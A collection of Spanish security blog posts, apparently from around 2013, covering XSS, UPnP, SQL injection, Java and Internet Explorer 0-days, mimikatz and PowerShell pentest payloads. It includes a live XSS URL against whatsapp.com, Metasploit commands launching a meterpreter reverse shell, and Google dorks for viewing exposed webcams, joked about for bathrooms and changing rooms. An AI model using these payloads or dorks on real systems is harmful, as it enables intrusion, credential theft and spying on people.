Web de WhatsApp vulnerable a XSS

Vale, muchos ya sabían desde hace tiempo que la página de búsqueda de FAQs de WhatsApp es vulnerable a XSS no persistente. Pero como acaban de publicar el aviso no he podido resistirme ;)

http://www.whatsapp.com/faq/search/?q=culPPables%27%3Cimg%20src=%22http://www.theblog.es/fotos/rajoy_barcenas.jpg%22%20onload=%22
 

Millones de dispositivos con UPnP vulnerables

Universal Plug and Play, en adelante UPnP, es un protocolo estandar que permite la comunicación entre dispositivos de red, facilitando el descubrimiento y permitiendo establecer automáticamente configuraciones. Uno de sus usos más típicos es habilitarlo en el router para que una aplicación (normalmente P2P) pueda abrir automáticamente puertos. Por defecto se soporta en Microsoft Windows, Mac OS X y en muchas distribuciones de Linux, y también viene activado en multitud de dispositivos, incluyendo routers, impresoras, cámaras, televisiones, etc. Además, aunque UPnP está destinado a ser utilizado principalmente en la LAN, millones de direcciones IP públicas en Internet responden a solicitudes de este protocolo...


Historicamente UPnP adolece de algunos problemas de seguridad: raramente los fabricantes implementan autenticación, a menudo están expuestas caratecteríticas con privilegios elevados en redes no confiables y es común encontrarse con errores de programación en muchas implementaciones de software UPnP. Pero, ¿cómo te quedarías si te dijéramos que mediante un sólo paquete UDP, cuyo origen podríamos falsificar, pudieramos explotar una vulnerabilidad y ejecutar código remotamente en cualquiera de cada uno de estos millones de dispositivos? Da miedo, ¿verdad? Pues sí es posible, has supuesto bien...

Premios RSA Conference al mejor blogger de seguridad

Ya están abiertas las votaciones para los premios al mejor blogger de seguridad de 2012 organizado por RSA Conference. Se trata de la quinta edición en la que cualquier blogger o podcaster de seguridad puede votar  
 
Os recomendamos que echéis un vistazo a los finalistas de cada categoría para ver lo mejor del panorama internacional (anglosajón):
  
Mejor blog de seguridad corporativo:

Fortinet Security Blog http://blog.fortinet.com/
Denim Group http://blog.denimgroup.com/
Trend Micro Cloud Security Blog http://cloudsecurity.trendmicro.com/
Veracode Security Blog http://www.veracode.com/blog/
Kaspersky Lab Blog https://www.securelist.com/en/
Sophos Naked Security Blog http://nakedsecurity.sophos.com/

Mejor podcast de seguridad:

Threat Post http://threatpost.com/en_us/podcast 
The Network Security Podcast http://netsecpodcast.com/
Eurotrash Security Podcast http://www.eurotrashsecurity.eu/index.php/Main_Page
Pauldotcom http://pauldotcom.com/
Exotic Liability http://www.exoticliability.com/
The Southern Fried Security Podcast http://www.southernfriedsecurity.com/

El blog de seguridad más educativo:

Cognitive Dissidents http://blog.cognitivedissidents.com/ 
Tao Security http://taosecurity.blogspot.com/
F-Secure blog http://www.f-secure.com/weblog/
The New School Security Blog http://newschoolsecurity.com/
AppSecInc Blog http://blog.appsecinc.com/
Evil Bytes/John Sawyer http://www.darkreading.com/blog/archives/evil-bytes/index.html

Recuperar un contenedor de TrueCrypt con WinHex

Cuando ciframos un disco entero con TrueCrypt en los primeros 512 bytes (la cabecera del volumen) se insertan las claves maestras para descifrarlo y la cadena "TrueCrypt Boot Loader",  por lo que es fácilmente identificable y si se corrompe o es parcialmente sobreescrito podemos recuperarlo usando un backup de esta cabecera.

La cosa se complica si tenemos una partición o un fichero contenedor y lo borramos accidentalmente con tan mala suerte de que su tamaño hace que no se haya almacenado en la papelera de reciclaje (que por otra parte es algo frecuente). Si examinamos el disco veremos un montón de datos pseudo-aleatorios y cifrados, y es probable que herramientas como Recuva no lo detecten (no existen firmas claras para encontrarlos).

Pero no todo está perdido. Podemos utilizar un editor hexadecimal como WinHex para recuperar un bloque de datos que corresponda a nuestro contendedor cifrado. No obstante, para ello tendrán que cumplirse dos requisitos: 1/ que el fichero no esté desfragmentado y 2/ que al inicio o al final del fichero le sigan un grupo de ceros (o conocer un patrón en hexadecimal que podemos obtener de un backup anterior del fichero).

¡Toda la privacidad de Internet en una sóla página!



(Esta página ha sido intencionalmente dejada en blanco)

Script en Python para obtener las contraseñas de PLCs de Siemens

El ICS-CERT ha publicado una alerta sobre la existencia y disponibilidad del código de una herramienta que que puede realizar ataques off-line de fuerza bruta contra controladores lógicos programables (PLCs) Siemens.

Los autores del código Python en cuestión son Alexander Timorin y Dmitry Sklyarov de SCADA Strange Love y han hecho público el código antes de que Siemens haya tenido la oportunidad de parchear el fallo u ofrecer alguna que otra mitigación.

Con el fin de ser capaz de utilizar la herramienta, un atacante primero debe capturar el tráfico del protocolo S7 que contiene los datos de autenticación en forma de desafío-respuesta:

  •     Password hashed (SHA1) on client (TIA Portal)
  •     Server (PLC) provide 20 byte challenge
  •     Client calculate HMAC-SHA1(challenge, SHA1(password) as response
Luego, mediante el uso del script, probar contra el fichero .pcap diferentes contraseñas hasta dar con la buena.

Abusando de la conversión de tipos para pequeñas inyecciones en MySQL

Leyendo el blog de Koto (Krzysztof Kotowicz) encontré un pequeño truco que puede ayudarnos a explotar inyecciones SQL en bases de datos MySQL. Primero vamos a ver el comportamiento del RBDMS:

mysql> desc t;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| name  | varchar(20) | YES  |     | NULL    |       |
| num   | int(11)     | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
2 rows in set (0.11 sec)
mysql> select * from t;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set (0.00 sec)
mysql> select * from t where name='';
Empty set (0.00 sec)
mysql> select * from t where name=''-'';
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)


¿Qué es lo que ha pasado? Vamos a investigar un poco:

"OP Octubre Rojo"... tomando el control mediante archivos adjuntos

El malware fue distribuido por más de medio mundo
Hace poco, Kaspersky publicó el descubrimiento de un malware dirigido a las "altas esferas" que pasó desapercibido durante mucho tiempo y parece haber sido programado por especialistas con intereses muy concretos. Surge la inmediata comparación con Flame, aunque todo apunta a que no llega a ese nivel de sofisticación. Su trama se ha llamado "Operación Octubre Rojo". 

Tras ojear la noticia me he puesto manos a la obra y hemos investigado un poco más sobre el alcance de este malware y su método de infección, el cual parece bastante eficaz. Según el mapa publicado por Kaspersky, buena parte de Europa, Asia e incluso África se ha visto afectada...

El método de infección:
Ejemplo de correo distribuyendo el malware

Esta es la parte más "curiosa". El principal método de infección es la distribución de ficheros adjuntos por email aprovechando vulnerabilidades en Office CVE-2009-3129 (Excel), CVE-2010-3333 y CVE-2012-0158 (ambas de Word). 

Vamos hacer un parón en este punto pues esta bien saber hacer de todo y si ha sido simple pero eficaz para "Operación Octubre Rojo" quien sabe algún día nos puede ser de utilidad a nosotros ;D

Los atacantes tomaron unos documentos previamente creados por una campaña de infección china, modificaron el payload y los enviaron a sus 
víctimas. El texto de los documentos no fue personalizado. Sin embargo, 
los diplomáticos, embajadores y víctima en general quedaron infectados.

Veamos como podemos aprovechar estos exploits en casita y sin sudar demasiado... imitando así el método de infección ..

Mega: primeros fallos de seguridad

Como muchos sabréis, el nuevo portal de descargas Mega, el sucesor de MegaUpload, se publicó el pasado domingo. En esta ocasión Kim Schmitz (alias Kim Dotcom) ha querido protegerse de la violación de derechos de autor utilizando un sistema que cifra los datos de usuario antes de que llegen a los servidores de Mega y mediante claves que sólo tienen los propios usuarios, es decir, su empresa no se hace responsable de los contenidos que alojan porque supuestamente los desconocen. Es lo que se denomina un servicio para compartir en la nube con cifrado en la parte del cliente, y ya se hizo en menor escala en otros sitios como securesha.re.

Esto evidentemente ha levantado ciertas suspicacias. Si a esto además le añadimos la polémica y la fama que preceden a este nuevo portal y sus pretensiones de gran seguridad mediante el uso de cifrado 128-bit AES y una infraestructura de clave asimétrica (2048-bit RSA), tenemos a Mega avocado a estar en el centro del huracán desde su nacimiento, algo por cierto no tan malo si tenemos en cuenta que su versión Beta cuenta desde su inicio con un ejército de Beta-testers. Y los resultados no se han hecho esperar...

En seguida se detectó un XSS en el portal y un problema (desmentido) con la generación aleatoria de números al crear claves. Además, muchos expertos en seguridad coinciden que el uso del navegador para cifrar la información abre vías de ataque como la obtención de las claves para romper SSL
(el uso de métodos criptográficos en javascript se considera "peligroso") o el uso de comandos contra los servidores de Mega, muchos de ellos alojados en los Estados Unidos.

Por último, recientemente un investigador ha publicado una herramienta denominada MegaCracker capaz de romper las contraseñas "hasheadas" que se envian a los usuarios dentro del correo de confirmación al crear una nueva cuenta. Es decir, si se intercepta ese correo, es posible obtener fácilmente la contraseña del usuario de Mega, una contraseña que se utiliza para cifrar la clave AES y de momento no es posible cambiar...

25 servicios VPN gratuitos for fun and profit

A estas alturas todos sabemos que una red privada virtual (VPN) permite cifrar los datos de las conexiones entre dos nodos, permitiendo no sólo la navegación web (como es el caso de los llamados proxies anónimos) si no también el uso de otros protocolos para correo electrónico, mensajería instantánea, voz sobre IP (VoIP) y cualquier otro servicio de Internet.

Existen muchos servicios VPN disponibles y la mayoría se utilizan para mantener el anonimato, si bien es importante decir que esto dependerá en gran medida de la confianza que deposites en el proveedor del servicio, ya que muchos registran tus pasos y podrían facilitar los logs si las autoridades así lo requiriesen, e incluso los más legales lo advierten en la aceptación de sus políticas de uso si existe abuso. No obstante, existen algunos proveedores que sitúan sus servidores en países en los que todavía no está definida claramente una legalidad y se comprometen a no almacenar ningún registro de conexión, pero eso ya es cuestión de confianza...
 
Otro de los típicos usos que se les da a estas VPNs es la de mantener la privacidad de las comunicaciones, dado que los datos irán cifrados desde el cliente hasta el terminador de túneles, invalidando así toda probabilidad de éxito para un ataque MiTM en ese tramo... y digo en ese tramo porque evidentemente el tráfico desde el servidor del proveedor al sitio a visitar viajará sin cifrar, por lo que la seguridad en este caso no sería completa.

Mi otra crítica de Hacker Épico

El "malévolo" portador del fichero
Tras unos días de ausencia justificada, absorto en mi lucha contra el cigarrillo, en mi determinación inquebrantable de dejar para siempre el tabaco, vuelvo a abrazar la escritura con algo que tenía pendiente antes de que el paso del tiempo mermase mi memoria: una breve crítica de la (esperada) novela 'Hacker Épico' escrita por Alejandro Ramos y Rodrigo Yepes.

La historia del libro gira en torno a Ángel Ríos, un consultor técnico que trabaja en una empresa de seguridad informática llamada Épica. Les juro que conozco una empresa española cuyo nombre coincide si modificamos una sóla de sus letras, y un consultor llamado Ángel que se fue a dicha empresa... ¿casualidad?, quizás sea sólo un juego de palabras para el título, o quizás no... El caso es que el ficticio personaje recibe la llamada de Yolanda, su amor platónico desde el instituto, y ésta (lejos de corresponder de primeras a su amor) le presta un pendrive de Hello Kitty y el reto de obtener la clave de un misterioso archivo pdf.

Tener amigos hasta en el infierno...
No les quiero destripar la trama, pero a partir de ese momento comienza una trepidante carrera en la que se entremezclan ciertos misterios, corrupción política al más estilo Gürtel o Pokémon, (algo de) hacktivismo y hacking, mucho hacking... En definitiva, durante el transcurso de la trama podremos ver el desarrollo de los hechos avanzando a través del pensamiento científico de Ángel y el apoyo físico e incontestable de su salvador amigo Marcos. Sin duda una historia que te atrapará fácilmente y que devorarás en menos de 48 bitshoras...

nishang: usando PowerShell para pentesting

Nishang es un framework con una colección de scripts y payloads que te permitirá usar PowerShell para realizar diversos ataques y tareas post-exploitación durante un pentest. La versión actual 0.2.1 incluye las siguientes utilidades:
  • Base64ToString.ps1: script que decodifica una cadena en base64.
  • Wait_For_Command.ps1: Payload que peticiones a una URL esperando instrucciones y descarga y ejecuta un script powershell.
  • Browse_Accept_Applet.ps1: Payload que navega silenciosamente por una URL y acepta un aviso de ejecución de un Applet de Java.
  • Credentials.ps1: este payload abre un prompt que solicita las credenciales del usuario y no se cierra hasta que se introducen los datos.
  • DNS_TXT_Pwnage.ps1: Payload que actúa como un backdoor y es capaz de recibir comandos y scripts PowerShell mediante peticiones DNS TXT.
  • Download.ps1: Payload para descargar un fichero en el directorio temporal del usuario actual.
  • Download_Execute.ps1: Payload para descargar un ejecutable en formato texto, convertirlo de nuevo a ejecutable y ejecutarlo.

Firewall Femme Fatale (esto me sucedió en 2010): Parte 1

 ***Ladies and Gentleman: Demontre Digital Unplugged. Las confesiones amargas de un ingeniero. Ríanse de mí, mis estimados lectores…

Se los voy a contar de una vez, voy a escribir este texto de corrido y sin pausa, si no luego me va a dar tentación de inventarles o añadirles melodrama. O peor aún de decirles mentiras. Sorry, pero me tengo que super explayar nuevamente. Porque ésta es de una de esas cosas, que “sacan a relucir los trapitos al Sol”; el orgullo y el ego son expuestos claramente de quien se siente una pistola, y que no más no pasa del noob cualquiera, rozándole al lammer. Y no exagero, así me sentí alguna vez. Sobre todo cuando regresé de la Ingeniería. Cosas oscuras que uno nunca le cuenta ni al espejo, bueno ni a la almohada siquiera, ahora imagínense a un auditorio lleno de técnicos maduros y voraces y en un sitio dedicado a la tecnología como éste. Ojalá no me fulminen muchachos. Uno va por la vida y hace las cosas como se le ocurre, o se le antoja, o lo que sea, hasta que llega el punto en que dices: "espérate, qué estoy haciendo, qué diantres te sucede". Y es peor cuando combinas el hecho de que sientes que puedes solo, no pides ayuda y te tienes una confianza soberbia que no hace más que arruinarlo todo. Digo que de repente hay como una bardita que te saltas y piensas: Nadie que yo conozca se ha saltado esta barda, yo me la estoy saltando, soy un machote. Soy un hacker.

Pues hagan de cuenta que era eso lo que calculaba cuando un día, en vidas pasadas, me asignaron mi primer caso de implementación de Seguridad Perimetral, para mí solito. Me doy un poco de asco cuando recuerdo la forma en cómo sucedió todo….***

¿Cómo quieren que empiece, pues? ¿Les cuento del origen de mi apestosa calaña? ¿Quieren saber a qué edad M3 Gu5t4b4 35cr1b1r 4s1 creyéndome The Mentor? ¿Cuáles fueron mis primeros programas mágicos con un botonsote en VB que decía “HACK THE WORLD”?? Mi primera vez con el “vi” de UNIX?? Cuando creí que ya sabía Networking porque ejecutaba a la perfección “save running config”??, Cuando quité un malware con el Norton y me creía un sanguinario de los Virus?? O más romántico me quieren…mi primera princesa convertida en sapo?? ¿No prefieren que antes de eso les dé tiempo para ponerse cómodos y que se puedan “pitorrear” de mí un ratote enorme?? No creo, porque no les serviría, y además ya bastante inextricable estoy en este texto para colocarme desde ahorita en las garras de mis lectores.


I summon the vast power of certification

Pero bueno no soy ningún ingenuo, sé lo que hago, soy quien soy: el lammer caído, la oveja negra de mi cliente/víctima, el ingeniero certificado y no apto, el que está de necio tecleando quién sabe qué con la línea de comandos, el brujo de este cuento. Bueno, ni modo de esperar que me pongan de princesa, no?? No espero nada, de hecho el gran problema es que siempre he sido un desesperado: quiero acabarlo todo cuando ni he comenzado. Así que igual empiezo con un cuento. Anótenle:

Vulnerabilidad crítica en el plugin Foxit PDF de Firefox (o aquí no se salva ni Perry)

Desde hace tiempo utilizo Foxit Reader como lector pdf por defecto, es ligero, rápido y consume menos recursos que Adobe Reader. Además el malware viene azotando continuamente a Adobe por simple economía de guerra: la mayoría de los usuarios lo utilizan y las probabilidades de propagarse son mayores. ¿Puedo entonces embutirme en mi batín mientras azuzo el fuego de una chimenea y entono el publicitario eslogan "me siento seguroooo"? Ni mucho menos...

Desde Adobe Reader X la seguridad se orienta al sandboxing y se han aplicado y se aplican múltiples correcciones como consecuencia de las vulnerabilidades descubiertas por un ejército de beta-testers deseosos de abrir las puertas a sus artefactos maliciosos. Por eso quizás Foxit Reader no sea el enemigo público número uno, pero eso no significa que sea más seguro.

El consultor italiano Andrea Micalizzi, alias rgod, nos lo recuerda recientemente mediante la publicación de una vulnerabilidad que afecta, eso sí, al plugin Foxit PDF para el navegador. Es decir, el bug no está presente en el lector PDF en sí mismo, si no en la librería npFoxitReaderPlugin.dll que actúa como intermediaria entre Foxit Reader y el navegador.

Concretamente el código es vulnerable a un desbordamiento de pila al procesar enlaces con peticiones largas. La prueba de concepto es contundente: actualmente funciona en la última versión de Firefox (18.0) y en la última versión de Foxit Reader (5.4.4.1128) con su plugin (2.2.1.530).  
Echemos un vistazo al código de rgod:

Nuevo 0-day de Java urge a desactivar el plugin del navegador

Hace unas horas Kafeine nos avisaba en su blog 'Malware don't need Coffee' de un nuevo 0-day que parece afectar a todas las versiones de Java 7 (incluida la actualización 10) y que podría permitir a un atacante ejecutar código arbitrariamente.

De momento no existe un análisis técnico detallado del problema, que parece ser una combinación de dos vulnerabilidades (una de ellas en el API Reflection), pero ya se han identificado numerosos sitios que podrían haber sido comprometidos a principios de año y que contienen este exploit para instalar malware de forma silenciosa (drive-by-download). Basta que el equipo de la víctima utilice un navegador con el plugin de java activado...

Todavía no hay parche de Oracle (el Critical Patch Updates oficial está previsto para el 15 de enero) y el código ya circula por Internet. Además el crimeware no pierde el tiempo para añadirlo a su arsenal: Blackhole, Nuclear Pack, Cool, Redkit... por lo que la única solución pasa por desactivar Java hasta nueva noticia.

ACTUALIZACIÓN 13/01/2013: Oracle publica Java SE 7 Update 11 que soluciona la vulnerabilidad CVE-2013-0422:  

ACTUALIZACIÓN 17/01/2013:  “En base a nuestro análisis, hemos confirmado que la reparación para CVE-2013-0422 es incompleta”, señaló Pawan Kinger, investigador de Trend Micro. Según dice, la vulnerabilidad proviene de fallos en dos partes del código base de Java, y el parche sólo reparó uno de las dos, dejando un agujero que todavía se puede explotar. Fte. FayerWaver

Por último, Metasploit también ha añadido el módulo que ya es totalmente funcional:

Ejecución de código arbitrario en Microsoft Internet Explorer 6, 7 y 8 (0 day user-after-free)

Hace unos días salía a la palestra de nuevo Microsoft Internet Explorer, a lo cual dicho sea de paso nos tiene más que aconstumbrados...

La razón es que Microsoft ha confirmado una vulnerabilidad de día 0 que afecta al navegador Internet Explorer 6, 7 y 8 (las versiones 9 y 10 no se ven afectadas).

El problema, al que se la que se le ha asignado el CVE-2012-4792, reside en que se accede a un objeto en la memoria que se ha eliminado o que se ha asignado incorrectamente (use-after-free) lo cual permite la ejecución de código arbitrario con los privilegios que tenga el usuario. Esta vulnerabilidad además puede permitir la elevación de privilegios y el compromiso de la totalidad del sistema.

Se han detectado ataques que explotan esta vulnerabilidad, como es el caso de la web http://www.cfr.org/ comprometida esta semana y, hasta el momento, Microsoft sólo aporta una solución rápida (“solución Fix it”) hasta la publicación del correspondiente parche en el boletín de actualizaciones: http://support.microsoft.com/kb/2794220.

También se ha publicado un exploit en el framework Metasploit. Os adjunto los comandos y un ejemplo gráfico de su ejecución:
use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Obteniendo con mimikatz las contraseñas en texto plano de las tareas programadas y del administrador de credenciales de Windows

Si recordáis, a principios del año pasado vimos lo fácil que era recuperar contraseñas en claro mediante la herramienta mimikatz. Resumiendo un poco, si se disponen de permisos de debug sobre el proceso del LSASS, esta herramienta inyecta una librería y obtiene la contraseñas en claro de dos proveedores de autenticación por defecto (Tspkg y Wdigest) que almacenan las credenciales de los usuarios de forma reversible.

Ahora su autor, el francés Gentil Kiwi, implementa y nos demuestra como obtener también las contraseñas en claro de las tareas programadas y del administrador de credenciales de Windows (contraseñas almacenadas de acceso a recursos compartidos, unidades de red, escritorios remotos, etc.). 

Vamos a probarlo y para ello empezaremos creando una tarea programada de prueba con un usuario local del equipo:


Ahora ejecutaremos mimikatz como SYSTEM y probaremos el módulo 'divers::secrets':

La base de datos de hackers más grande en Internet

Infosec Institute ha añadido a su comunidad SOLDIERX la base de datos de hackers más grande publicada en Internet de la que incluso dicen rivaliza con la del FBI:

"La SOLDIERX HDB es la mayor base de datos pública de hackers en la red y se rumorea que es sólo comparable con la base de datos de hackers del FBI. Su base de datos de hackers contiene una lista de programadores, desarrolladores, sombreros negros, sombreros blancos, investigadores de seguridad, falsos hackers éticos, hacktivistas, packet kiddies, click kiddies, script kiddies, profesionales de seguridad, héroes de la revolución informática (hola Steven Levy), los hackers de hardware, ch1xors (oh sí! aunque algunas personas creen que son inexistentes), los hackers de videojuegos y aquellos que han aceptado e incorporado la cultura hacker ....."

La mayoría de las entradas en la HDB (aunque no todas) puede considerarse hackers, de acuerdo a Steven Levy (editor de Wired) y a la descripción de la ética hacker y sus principios:

- Acceso a ordenadores (y a cualquier cosa que pueda enseñarte algo acerca de la forma en que funciona el mundo) debería ser ilimitado y total.
- Toda la información debe ser libre.
- Desconfianza en la autoridad, promover la descentralización.
- Los hackers deben ser juzgados por hacking, no por falsos criterios tales como títulos, edad, raza o posición.
- Tú puedes crear arte y belleza en un ordenador.
- Los ordenadores pueden cambiar tu vida para mejor.

Personalmente hecho en falta a muchísima gente en esa base de datos, muchos de ellos y claro está del panorama nacional. Por supuesto pienso también que en esa lista habrá siempre grandes olvidados ya que muchos de los grandes hackers son anónimos y seguirán siéndolo. No obstante, actualmente incluye 750 nombres/nicks por lo que es sin duda un gran "bestiario", ¿no crees? ;):
http://www.soldierx.com/hdb

Algunos google dorks para espiar cámaras web en Internet

El otro día afinando una búsqueda y al comenzar a teclear 'inurl' Google autocompletó 'inurl view index shtml baños'... vamos uno de los clásicos dorks para buscar cámaras web y ya de paso, y por qué no, que sea en unos baños...  "Tienes alguna de algún cambiador de ropa de zara o de algún baño femenino?"


XD.. pero... ¡desde cuando se instalan cámaras en baños o cambiadores de tiendas de ropa!. Lo cierto es que si juntamos el innato voyeurismo humano con el deseo inherente de encontrarnos alguna escena tipo Porky's, miles de cámaras en Internet nos brindan la posibilidad de asomarnos por ese agujerito indiscreto. 
 

Ya sea por fallos en el software de las cámaras o por carencias en la configuración, es tan sencillo acceder a ellas como introducir unas simples búsquedas en San Google (no tan santo a veces):

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh

Directory Traversal en módems 2wire 4011G y 5012NV

Recientemente acabo de leer una entrada en la Comunidad Underground de México en la que avisan de una interesante vulnerabilidad de directory traversal en los módems 2wire 4011G y 5012NV, unos de los más populares del país distribuidos por Telmex y otros ISPs y cuyos modelos anteriores ya adolecieron de algunas otras vulnerabilidades importantes como CSRF y DoS.

La vulnerabilidad de la que hablamos ahora fue descubierta por Abraham Díaz en septiembre de 2012 que, tras intentar avisar al fabricante y al ISP y después de no recibir respuesta, decidió publicarla el 31 de diciembre.

El problema está en el formulario de inicio de sesión del portal de configuración por http de estos módems, específicamente en el control oculto llamado __ENH_ERROR_REDIRECT_PATH__ que no es validado correctamente en el servidor. Un atacante sin autenticación puede manipular su valor para obtener del dispositivo archivos con contraseñas de fábrica en texto plano, configuraciones, etc.